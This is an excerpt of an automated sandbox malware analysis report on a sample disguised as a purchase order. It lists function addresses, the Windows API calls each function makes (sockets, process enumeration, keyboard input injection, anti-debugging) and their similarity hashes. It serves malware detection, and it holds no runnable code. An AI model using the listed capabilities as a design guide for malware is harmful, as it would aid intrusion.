                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                            Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 00433073
                                                            • __swprintf.LIBCMT ref: 00433085
                                                            • __wcsicoll.LIBCMT ref: 00433092
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                            • LockResource.KERNEL32(00000000), ref: 004330CA
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                            • LockResource.KERNEL32(?), ref: 00433120
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                            • String ID:
                                                            • API String ID: 1158019794-0
                                                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                            Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                            Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                            • GetLastError.KERNEL32 ref: 0045D6BF
                                                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                            Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_strncmp
                                                            • String ID: @oH$\$^$h
                                                            • API String ID: 2175499884-3701065813
                                                            • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                            • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                            • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                            • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                            Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                            Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                            • API String ID: 0-2872873767
                                                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                            Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                            • __wsplitpath.LIBCMT ref: 00475644
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscat.LIBCMT ref: 00475657
                                                            • __wcsicoll.LIBCMT ref: 0047567B
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                            • String ID:
                                                            • API String ID: 2547909840-0
                                                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                            Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                            • FindClose.KERNEL32(?), ref: 004525FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                            • String ID: *.*$\VH
                                                            • API String ID: 2786137511-2657498754
                                                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                            Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID: pqI
                                                            • API String ID: 2579439406-2459173057
                                                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                            Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wcsicoll.LIBCMT ref: 00433349
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                            • __wcsicoll.LIBCMT ref: 00433375
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicollmouse_event
                                                            • String ID: DOWN
                                                            • API String ID: 1033544147-711622031
                                                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                            Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: KeyboardMessagePostState$InputSend
                                                            • String ID:
                                                            • API String ID: 3031425849-0
                                                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                            Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                            Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                            • IsIconic.USER32 ref: 0047A393
                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                            • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                            Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
